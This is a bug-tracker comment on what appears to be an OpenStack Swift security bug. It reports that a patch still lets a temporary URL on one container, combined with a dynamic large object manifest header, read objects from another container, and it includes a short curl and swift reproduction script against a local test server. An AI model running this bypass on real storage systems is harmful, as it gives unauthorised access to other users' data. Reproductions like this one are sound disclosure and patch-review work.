Comment 61 for bug 1449212

Looks like the patch is still allowing to abuse DLO+container tempurl, for example using the following simple script:

 echo 12345 > foo.txt
 swift upload victim-container foo.txt
 swift post -m "temp-url-key: secret" compromised-container

 tempurl=`swift-temp-url PUT 60 /v1/AUTH_test/compromised-container/foo.txt secret`
 curl -i -X PUT http://127.0.0.1:8080${tempurl} -H 'X-Object-Manifest: victim-container/f' -H 'Content-Length: 0'

 tempurl=`swift-temp-url GET 60 /v1/AUTH_test/compromised-container/foo.txt secret`
 curl -i http://127.0.0.1:8080${tempurl}

Or did I get it wrong?